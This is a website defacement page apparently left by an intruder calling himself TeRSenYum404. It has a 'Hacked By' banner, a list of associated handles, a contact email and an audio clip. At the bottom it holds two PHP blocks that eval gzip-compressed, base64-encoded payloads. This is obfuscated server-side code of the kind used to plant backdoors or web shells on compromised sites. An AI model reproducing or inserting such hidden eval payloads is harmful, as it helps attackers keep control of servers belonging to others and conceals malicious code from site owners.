<html><head><title>Hacked By ./TeRSenYum404</title> <meta property="og:image"content="https://i.postimg.cc/Vvh90Dj9/Te-RSen-Yum404.jpg">
<meta name="Description" content="SUNDA CYBER ARMY">
  	<link href="https://fonts.googleapis.com/css?family=Iceland:400,700" rel="stylesheet" type="text/css">
  </head><body>
<style>
            @import url('https://fonts.googleapis.com/css?family=Pirata+One');
            body {
                font-family: courier new;
                background: #white;
                color: #28FE14;
            }
            .t3x { 
                font-family: pirata one;
                -webkit-animation-name: blinker; 
                -webkit-animation-duration: 2s; 
                -webkit-animation-timing-function: linear; 
                -webkit-animation-iteration-count: infinite; 
                -moz-animation-name: blinker; 
                -moz-animation-duration: 1s; 
                -moz-animation-timing-function: linear; 
                -moz-animation-iteration-count: infinite;
                animation-name: blinker; 
                animation-duration: 1s; 
                animation-timing-function: linear; 
                animation-iteration-count: infinite;
                color: #385164; }     
                @-moz-keyframes blinker { 
                0% { opacity: 1.0; }
                50% { opacity: 0.0; } 
                100% { opacity: 1.0; } } 
                @-webkit-keyframes blinker { 
                0% { opacity: 1.0; } 
                50% { opacity: 0.0; } 
                100% { opacity: 1.0; } } 
                @keyframes blinker {
              0% { opacity: 1.0; } 
              50% { opacity: 0.0; } 
              100% { opacity: 1.0; } }
            }
</style>
  <center><br>
      <img src="https://i.postimg.cc/Vvh90Dj9/Te-RSen-Yum404.jpg" style="width:400px; height:400px;"><br>
	<h1 class="t3x">
	  <font color="white" style="text-shadow: 0 0 20px black, 0 0 5px black, 0 0 7px black, 0 0 45px black; font-weight:bold: blue;font-size:60px">[!] Hacked By ./</font><font color="black" style="color:black;text-shadow: 0 0 3px red, 0px 0px 5px red;font-size:60;">TeRSenYum404</font><font color="white" style="text-shadow: 0 0 20px black, 0 0 5px black, 0 0 7px black, 0 0 45px black; font-weight:bold: blue;font-size:60px"> [!]</font></h1><br>

	<font face="pirata one" color="white" style="text-shadow: 0 0 20px black, 0 0 5px black, 0 0 7px black, 0 0 45px black; font-weight:bold: blue;font-size:50px">Fake Freinds;</font><br>
	<marquee behavior="alternate" width="800"><font face="pirata one" color="white" style="text-shadow: 0 0 20px black, 0 0 5px black, 0 0 7px black, 0 0 45px black; font-weight:bold: white;font-size:30px">MISTER_D ~ BH3N0T ~ ./Snopunks404 ~ Parker'z Gans ~ Tuan.Cepot ~ Mr$03 ~ Newbie_Tersakiti ~ DeathLocked Gans ~ x-MOON-x</font></marquee>
	<br><font face="iceland" color="white" style="text-shadow: 0 0 20px black, 0 0 5px black, 0 0 7px black, 0 0 45px black; font-weight:bold: blue;font-size:25px">>>>Contact Me: hamdanny1707@gmail.com<<<</font><br><br>
 
      <audio controls><source src="https://c.top4top.net/m_1156dz7ty0.mp3" type="audio/mpeg"></audio><br>
  </center><?php eval(gzinflate(base64_decode('jY9La8JAEMfvgXyHYRE2lvgolFISBG1NwYN9xNiLyLJNVnfbbBJ2J6Df3k2lYm89Dczv/5iZqkoxKzCgdYtNi+yz3e2EUdWehjDuxzC9CAplm5IfmTCmNvaMfc8hhkoLViqtMOgsF4cWujbHM3F6en+3pI5LwQthAvpUVygqHGTHRkS+h+KAI4m6jCGX3LiEyTp7Hjx0lh62Xy2vNFclTIB+i7xFza2St+PpvtsO81pTpzuwhqP0vQkQidhEoxGBIfTYKkk/knRDz5O9zJYJ3f4hafK+TlYZW6cLunWP9RphecV4KQy6TrJTh994iBq4WbzBrCiMsBYi2ICrcZ6rtOVrlrDZfJ7+9BDYkhi6S4OrX0LfIyl/VApzSUK4rgyB/Cu0H58A'))); ?>
<?php eval(gzinflate(base64_decode('c0jOL6jUcFCJd/P0cQ2OVq9Qj41WL8ktiM9LzE1Vj9VBk4GIaloDAA=='))); ?></body></html>
